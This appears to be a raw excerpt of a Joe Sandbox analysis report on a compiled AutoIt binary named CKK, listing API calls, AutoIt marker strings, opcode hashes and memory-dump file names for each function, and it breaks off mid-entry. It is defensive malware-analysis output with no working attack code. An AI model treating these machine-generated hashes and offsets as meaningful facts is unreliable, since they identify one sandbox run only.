                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 146820519-0
                                                                                              • Opcode ID: 2f0a05e6e574be6a6d2fde4bcb942d86e3557e2da8a673a1a5bcabf789833f5d
                                                                                              • Instruction ID: f692337eb8a3bb40e7ccf47f1904ac2166d1b51641578231eeab5b6644f00907
                                                                                              • Opcode Fuzzy Hash: 2f0a05e6e574be6a6d2fde4bcb942d86e3557e2da8a673a1a5bcabf789833f5d
                                                                                              • Instruction Fuzzy Hash: 1D127C71A083019FC714DF28C984B6ABBE1BF88324F04C95DE9998B252DB75ED45CF92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ac1c4bbe12c7561e6e69c39b8b18539c3b28f25924a5630c7fd0c7396ade502
                                                                                              • Instruction ID: b67d7a3eac2456a952ee927b9040ba94fb5c7a58d427c09c3120568bb5a1bfd6
                                                                                              • Opcode Fuzzy Hash: 9ac1c4bbe12c7561e6e69c39b8b18539c3b28f25924a5630c7fd0c7396ade502
                                                                                              • Instruction Fuzzy Hash: 7651D271E00629AFCB25DFBCEA45FEEBBB4BF45310F140069F405A7291E6319941CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F1BF4
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 009F1BFC
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F1C07
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F1C12
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 009F1C1A
                                                                                                • Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 009F1C22
                                                                                                • Part of subcall function 009F1B4A: RegisterWindowMessageW.USER32(00000004,?,009F12C4), ref: 009F1BA2
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009F136A
                                                                                              • OleInitialize.OLE32 ref: 009F1388
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A324AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1986988660-0
                                                                                              • Opcode ID: 38492ff7d1d4d8de2ac96e071e2ec97ffe2c44f40266e891d5d49202111a3fba
                                                                                              • Instruction ID: 04b5f169dc8629626dbe4ec7a1afa734a9445d15894c20ae586063b440290686
                                                                                              • Opcode Fuzzy Hash: 38492ff7d1d4d8de2ac96e071e2ec97ffe2c44f40266e891d5d49202111a3fba
                                                                                              • Instruction Fuzzy Hash: 94719EB4B152088FC784EFF9AA45E653AE0FB8A354756816ED10AD7363EB308443CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 009F556D
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 009F557D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: fafc52af4a1c1fa7d0d35bb8b675897573ddd07e231419b067c0a502a88d0b2d
                                                                                              • Instruction ID: 83411de4a13765b5ed1183088412443de5be7b0581d71ffe6aba61a3235a0145
                                                                                              • Opcode Fuzzy Hash: fafc52af4a1c1fa7d0d35bb8b675897573ddd07e231419b067c0a502a88d0b2d
                                                                                              • Instruction Fuzzy Hash: 95315E71A00A09FFDB14CF68C880BA9B7B6FB48314F15862AFA1597240D775FE94CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00A28704
                                                                                              • GetLastError.KERNEL32(?,00A285CC,?,00AB8CC8,0000000C), ref: 00A2870E
                                                                                              • __dosmaperr.LIBCMT ref: 00A28739
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2583163307-0
                                                                                              • Opcode ID: 7fa58f309c16ebe85754026d5b45ea8a2abcdb00360ed2466f39fcea4f6e534a
                                                                                              • Instruction ID: 6c4690462b00aa2a8f93dda6043c79492ad132e24cd3742dba36dc63ee3d84c3
                                                                                              • Opcode Fuzzy Hash: 7fa58f309c16ebe85754026d5b45ea8a2abcdb00360ed2466f39fcea4f6e534a
                                                                                              • Instruction Fuzzy Hash: BA016B32A0623026D220E37CB949B7E67594B82774F390139F8148F0D3DEB8CC829290
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00A62FF2
                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A63006
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A6300D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 3397143404-0
                                                                                              • Opcode ID: 531261f408ab06d1a6d4f1e97dae8758e41db2d8d63abab164fa8268e129fd6e
                                                                                              • Instruction ID: ba335f9ab9fb46202a3be4547b3f7b94ceb7c7701c33eb1dd49da255f10db7f9
                                                                                              • Opcode Fuzzy Hash: 531261f408ab06d1a6d4f1e97dae8758e41db2d8d63abab164fa8268e129fd6e
                                                                                              • Instruction Fuzzy Hash: B3E0863228021077D6301795BC4DF8B3E1CD78AB71F114210F719790D086B0150357B8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00A017F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: CALL
                                                                                              • API String ID: 1385522511-4196123274
                                                                                              • Opcode ID: 3cc52da2b4de0789d2bd7f9b1610f76c22e8ba4a7cbd68bfe2276cb0a0804bd8
                                                                                              • Instruction ID: 42530ef10e10c37da358d068372a1d0a10d6f558f340a44ab17829246f07a353
                                                                                              • Opcode Fuzzy Hash: 3cc52da2b4de0789d2bd7f9b1610f76c22e8ba4a7cbd68bfe2276cb0a0804bd8
                                                                                              • Instruction Fuzzy Hash: 5922ACB46083459FC714CF14D880B6ABBF1BF89314F24892DF4968B3A1D772E945CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A66F6B
                                                                                                • Part of subcall function 009F4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad_wcslen
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 3312870042-2806939583
                                                                                              • Opcode ID: 239fcafb5297a7ae03cac6e09ea9f1aa4bfe28ba3fb11c8141d7447cd1d1c67c
                                                                                              • Instruction ID: 5f54bba7a9c2bdd1aaa1b3a23dcc99fcc9504c5ff33518e00826e1dfdd6a11b5
                                                                                              • Opcode Fuzzy Hash: 239fcafb5297a7ae03cac6e09ea9f1aa4bfe28ba3fb11c8141d7447cd1d1c67c
                                                                                              • Instruction Fuzzy Hash: ADB17E711182058FCB14EF20C491ABEB7F5AFD4314F04896DF59A972A2EB70ED49CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 7bbe58f8c9cca95008fe62d9ac712635aa39615218ab0bb04b83d1f45ef42b4d
                                                                                              • Instruction ID: e77a6c4f4a8077201dadbc3d842fcecbb16872b8c631a3e0895b6ec2d30bd90b
                                                                                              • Opcode Fuzzy Hash: 7bbe58f8c9cca95008fe62d9ac712635aa39615218ab0bb04b83d1f45ef42b4d
                                                                                              • Instruction Fuzzy Hash: 574126709042A89ADB218F6C9D84AFEBBB9EB45314F2404FDE58A87142D2359A85DF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00A32C8C
                                                                                                • Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2
                                                                                                • Part of subcall function 009F2DA5: GetLongPathNameW.KERNELBASE ref: 009F2DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                              • String ID: X
                                                                                              • API String ID: 779396738-3081909835
                                                                                              • Opcode ID: 3fafc455891e6c21aec4ef4833604b32745c97b0ef83bd69a9f48b9736839cbc
                                                                                              • Instruction ID: d66d94a6c17b2717d1415276203d4e18d1ab3676e142aea9a7a25a7f1f6abb96
                                                                                              • Opcode Fuzzy Hash: 3fafc455891e6c21aec4ef4833604b32745c97b0ef83bd69a9f48b9736839cbc
                                                                                              • Instruction Fuzzy Hash: 64219371A0029C9BCB01DF94C845BEE7BFCAF89314F108059E505AB241DBB89A898F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID: EA06
                                                                                              • API String ID: 2638373210-3962188686
                                                                                              • Opcode ID: 5b237a17ebd0d76ff544d0803adeafdea1c70192d4b7d5620afd494522c5e7f9
                                                                                              • Instruction ID: d92078151bab9569b5faea205e322c271b22fb2ee11c9bbf280c188a8d09ca0c
                                                                                              • Opcode Fuzzy Hash: 5b237a17ebd0d76ff544d0803adeafdea1c70192d4b7d5620afd494522c5e7f9
                                                                                              • Instruction Fuzzy Hash: 6F01B1729042687EDF28C7A8C856FEEBBFC9B05301F00459AF593D21C1E5B8E6488B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00A234D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 47e26d71a05e7528a1f64ae51f790448a01d0a6925aa9bb89e6c4c16992f9761
                                                                                              • Instruction ID: 9e51caccd9c47c50e8ffd5b708d69f69d1b38d84d68ab25e201d69576d537fb6
                                                                                              • Opcode Fuzzy Hash: 47e26d71a05e7528a1f64ae51f790448a01d0a6925aa9bb89e6c4c16992f9761
                                                                                              • Instruction Fuzzy Hash: F101293264021CBBCF12AF95DD01EEE7FA2EF08761F004154FE042A160C636C971EB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 827250f0e2a5d66a6d42b6d448e0cd3f485d0796acee818f2959dfc171feed7e
                                                                                              • Instruction ID: e40f3e131b422506f50e9ccb68d0d76645694d9c363c8827c91d16625d6895a7
                                                                                              • Opcode Fuzzy Hash: 827250f0e2a5d66a6d42b6d448e0cd3f485d0796acee818f2959dfc171feed7e
                                                                                              • Instruction Fuzzy Hash: 8AE0553678122CB7DF00ABA4AD02FAEBBA0EF54721B000226F80457240C9700F12DBD6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • try_get_function.LIBVCRUNTIME ref: 00A13615
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: try_get_function
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2742660187-671089009
                                                                                              • Opcode ID: e02d01054c01971ea94394a63ffa89313b1166a29ba83f2aff3d6e9671bd211a
                                                                                              • Instruction ID: 22cbc100c871c2df35dcb0d568b76ce09cabae7a624897bfaf54a783921c6a7d
                                                                                              • Opcode Fuzzy Hash: e02d01054c01971ea94394a63ffa89313b1166a29ba83f2aff3d6e9671bd211a
                                                                                              • Instruction Fuzzy Hash: 9DD0C2336842247BC6003B90AD06AA9BA45EB01BB2F040471FE0C9524085614E2147D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 001911DC
                                                                                                • Part of subcall function 001908E0: GetFileAttributesW.KERNELBASE(?), ref: 001908EB
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00191235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesCreateDirectoryFileFolderPath
                                                                                              • String ID:
                                                                                              • API String ID: 1991693529-0
                                                                                              • Opcode ID: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
                                                                                              • Instruction ID: de72d5ee9aee0eaa154fb2104cd41bf0d68e0d4e767c39b668b03c2cb7efb4d7
                                                                                              • Opcode Fuzzy Hash: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
                                                                                              • Instruction Fuzzy Hash: 61513031A10209A6EF14DFA0D855BEF7379FF58700F004569E60DE7290EB769B84CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A2C74F: GetOEMCP.KERNEL32(00000000), ref: 00A2C77A
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A2CA1D,?,00000000), ref: 00A2CBF0
                                                                                              • GetCPInfo.KERNEL32(00000000,00A2CA1D,?,?,?,00A2CA1D,?,00000000), ref: 00A2CC03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: 4519ac906f751b248403578bcece22ce8c1874916cfdbfa2e79a7b24a3cb7a2f
                                                                                              • Instruction ID: 8310c22e89e559fcaac2c8b31ec35f92ca1bc539c1491dc4e14453d9067c1cf1
                                                                                              • Opcode Fuzzy Hash: 4519ac906f751b248403578bcece22ce8c1874916cfdbfa2e79a7b24a3cb7a2f
                                                                                              • Instruction Fuzzy Hash: 95512270A043659FDB249F7DE881ABFBBF5EF41320F14807ED09A8B152D73999428B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A22D74: GetLastError.KERNEL32(?,?,00A25686,00A33CD6,?,00000000,?,00A25B6A,?,?,?,?,?,00A1E6D1,?,00AB8A48), ref: 00A22D78
                                                                                                • Part of subcall function 00A22D74: _free.LIBCMT ref: 00A22DAB
                                                                                                • Part of subcall function 00A22D74: SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DEC
                                                                                                • Part of subcall function 00A22D74: _abort.LIBCMT ref: 00A22DF2
                                                                                                • Part of subcall function 00A2CADA: _abort.LIBCMT ref: 00A2CB0C
                                                                                                • Part of subcall function 00A2CADA: _free.LIBCMT ref: 00A2CB40
                                                                                                • Part of subcall function 00A2C74F: GetOEMCP.KERNEL32(00000000), ref: 00A2C77A
                                                                                              • _free.LIBCMT ref: 00A2CA33
                                                                                              • _free.LIBCMT ref: 00A2CA69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 2d2f7c4545896dd879ab73e23ed79b4343a19c0710e73d515cfdd392e8e901fd
                                                                                              • Instruction ID: 4e538ff77e93c3d415eccc5b4956ebaf6bfeb9902dc802e7a322374543217807
                                                                                              • Opcode Fuzzy Hash: 2d2f7c4545896dd879ab73e23ed79b4343a19c0710e73d515cfdd392e8e901fd
